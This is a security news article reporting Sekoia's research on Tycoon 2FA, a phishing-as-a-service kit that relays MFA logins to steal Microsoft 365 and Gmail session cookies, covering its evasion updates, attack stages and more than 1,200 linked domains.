Tycoon 2FA, a popular phishing platform as a service (PhaaS) responsible for thousands of attacks on Microsoft 365 and Gmail accounts, has become even more difficult to detect.
The phishing toolset has been active since at least August 2023, according to research from SaaS security company Sekoia, which discovered the PhaaS in October last year.
Tycoon 2FA is an adversary-in-the-middle (AitM) phishing kit that primarily targets Microsoft 365 accounts by collecting session cookies to bypass MFA authentication processes.
On March 25, 2024, Sekoia published research indicating that the group had released a new version of its phishing kit that features better detection evasion capabilities.
The main changes concern the kit's JavaScript and HTML code and improvements to its ability to detect and evade traffic patterns associated with scanning environments, such as IP addresses hosted in data centers or linked to the Tor network.
The kit has also been updated to reject any traffic associated with specific user agent strings and some versions of Linux web browsers.
The report claims that tracking Tycoon 2FA activities has become much more difficult after the group improved its stealth capabilities.
“Recent updates could reduce the rate of detection by security products of phishing pages and Tycoon 2FA infrastructure. Additionally, its ease of use and relatively low price make it quite popular among threat actors.”
A typical Tycoon 2FA attack
Sekoia broke down a typical phishing attack using Tycoon 2FA into the following stages.
Stage 0 involves the distribution of phishing links using URL redirects and QR codes embedded in the body of an email or its attachments. The service provides hackers with phishing attachment templates as well as pre-designed decoy documents.
Stage 1 consists of a Cloudflare Turnstile challenge to prevent unwanted traffic from affecting the availability of the phishing site. The second stage executes a JavaScript code that redirects users to another page and finally extracts the victim's email address.
In stage 3, victims are redirected once again and stage 4 presents them with a fake Microsoft Authentication login page that uses Websockets to steal user credentials.
Stage 5 is the point at which the fake login page aims to trigger the 2FA challenge, transmitting the user's input to the legitimate Microsoft Authentication API, which returns the appropriate information to the user.
But because of its position in the middle of this process, the hacker's C2 server can save session cookies, which can be used to replay a session and avoid the MFA stage in the future.
“This 2FA relay capability is the core feature of an AiTM phishing kit, which aims to intercept login data during a legitimate session-based authentication between the victim and the legitimate service.”
The final stage involves redirecting the victim to a URL specified by the threat actor, which Sekoia found often directed to legitimate or legitimate-looking pages, in the hopes that they would not suspect that the previous page was malicious.
Max Gannon, cyber intelligence analysis manager at email security specialist Cofense, said MFA bypass kits like the one described above have leveled the playing field for attackers in the phishing arms race.
“These multi-factor authentication (MFA) bypass kits are undoubtedly effective, which has likely led some people to claim that this is a failure on the part of MFA. However, MFA prevents someone with stolen credentials from accessing resources without authorization,” he explained.
“When victims fall victim to these MFA bypass phishing attacks, they are effectively logging in and authorizing access that MFA simply cannot protect against.
“These kits essentially reset the phishing arms race to where we were before the advent of MFA, where the key factor in preventing account compromise is the person who is being phished.”
Business is booming for Tycoon 2fa, with over 1,200 domains linked to the platform
Tycoon 2FA first gained attention thanks to a Sekoia threat analyst who discovered the first evidence of the kit while conducting a routine threat search in October 2023.
Sekoia analysts analyzed several phishing pages, which led them to identify several similarities in their obfuscation techniques.
Sekoia analysts used these similarities to identify hundreds of more phishing pages generated using the same infrastructure and eventually stumbled upon a number of domains believed to belong to the threat actor behind the phishing platform.
Notably, these domains shared the same login panel labeled “powered by TycoonGroup,” as well as a domain that hosted a website promoting Tycoon 2FA as “the best phishing platform to bypass 2FA.”
Sekoia has been actively monitoring the phishing infrastructure underpinning the Tycoon 2FA PhaaS operation since discovering the group, and has identified more than 1,200 domain names associated with the platform since August.
Using data from cryptocurrency transactions allegedly attributed to SaaD Tycoon Group, Sekoia claims that the group's operations are highly lucrative and predicted that the platform will remain a prominent player in the AiTM phishing market in 2024.